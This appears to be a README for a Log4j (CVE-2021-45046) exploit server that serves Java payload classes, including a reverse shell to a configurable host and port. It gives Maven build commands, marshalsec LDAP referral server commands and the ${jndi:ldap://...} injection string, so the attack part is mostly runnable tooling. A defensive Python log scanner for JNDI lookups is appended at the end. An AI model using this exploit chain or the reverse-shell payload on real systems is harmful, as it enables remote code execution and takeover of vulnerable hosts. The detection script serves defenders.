As part of a demonstration of the log4j vulnerability CVE-2021-45046, a small web server was needed to serve various payloads/gadgets.
Even though the ExploitServer can serve multiple exploit payloads, marshalsec can only support one per instance, as far as I have gathered. You can, however, run multiple instances of marshalsec.
Note that these were tested on macOS and Java 8. The exploits need to be self-contained and cannot depend on external classes outside what would be available on the attack target virtual machine.
Any configuration of the exploit is done during build. Properties can be changed in the properties section of the pom file.
Opens a web page using the macOS 'open' command.
Property | Description | Default value |
---|---|---|
exploit.openwebpage.targeturl | Target webpage | https://www.google.com |
This was based on the code in https://github.com/kozmer/log4j-shell-poc. Some modifications were done, but the main functionality was taken from the Exploit.java file.
Property | Description | Default value |
---|---|---|
exploit.remoteshell.host | Address of reverse shell proxy | localhost |
exploit.remoteshell.port | Port of reverse shell proxy | 9001 |
The application is built using Apache Maven.
$> mvn clean install
$> mvn exec:exec
$> java -jar target/log4j-exploit-server-0.0.1-SNAPSHOT.jar
$> curl http://localhost:8000/OpenWebPage.class --output -
Assuming Maven and Java are installed, you can execute the following commands:
git clone https://github.com/mbechler/marshalsec.git
cd marshalsec
mvn clean package -DskipTests
Then you can choose which exploit to serve on the LDAP server:
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://localhost:8000/#OpenWebPage
or
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://localhost:8000/#RemoteShell
or even both, with each marshalsec instance on its own port:
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://localhost:8000/#OpenWebPage 10000
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://localhost:8000/#RemoteShell 10001
${jndi:ldap://<marshalsec host>:<marshalsec port>/a}
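
For triaging logs on the target side of the demonstration, the following added example (not part of the original project) scans log lines for the lookup string shown above and tallies the endpoints it points to, so they can be checked against egress logs. The sample log lines, addresses and function names are constructed for illustration, and only the plain `${jndi:...}` form shown on this page is matched.

```python
import re
from collections import Counter

# Matches the plain lookup form shown above:
#   ${jndi:<scheme>://<host>[:<port>][/<path>]}
JNDI_LOOKUP = re.compile(
    r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^:/}\s]+)"
    r"(?::(?P<port>\d+))?(?P<path>/[^}\s]*)?\}",
    re.IGNORECASE,
)

# Well-known default ports, used when the lookup string omits the port.
DEFAULT_PORTS = {"ldap": 389, "ldaps": 636, "rmi": 1099}


def find_jndi_lookups(line):
    """Return one dict per JNDI lookup string found in a single log line."""
    hits = []
    for m in JNDI_LOOKUP.finditer(line):
        scheme = m.group("scheme").lower()
        port = m.group("port")
        hits.append({
            "scheme": scheme,
            "host": m.group("host").lower(),
            "port": int(port) if port else DEFAULT_PORTS.get(scheme),
            "path": m.group("path") or "",
        })
    return hits


def summarize(lines):
    """Count lookups per (scheme, host, port) endpoint across all lines."""
    endpoints = Counter()
    for line in lines:
        for hit in find_jndi_lookups(line):
            endpoints[(hit["scheme"], hit["host"], hit["port"])] += 1
    return endpoints


# Constructed sample application log lines (documentation address ranges).
SAMPLE_LOG = [
    "2021-12-14 10:01:02 WARN  Unknown value: ${jndi:ldap://198.51.100.20:10000/a}",
    "2021-12-14 10:01:05 WARN  Unknown value: ${jndi:ldap://198.51.100.20:10001/a}",
    "2021-12-14 10:02:00 INFO  Request served in 12 ms",
    "2021-12-14 10:03:11 ERROR Login failed for ${jndi:ldap://ldap.example.test/a}",
    "2021-12-14 10:03:12 ERROR Login failed for ${JNDI:LDAP://198.51.100.20:10000/a}",
]

if __name__ == "__main__":
    for endpoint, count in summarize(SAMPLE_LOG).most_common():
        print(endpoint, count)
```

Two distinct ports on the same host in the tally correspond to the two-instance marshalsec setup described above.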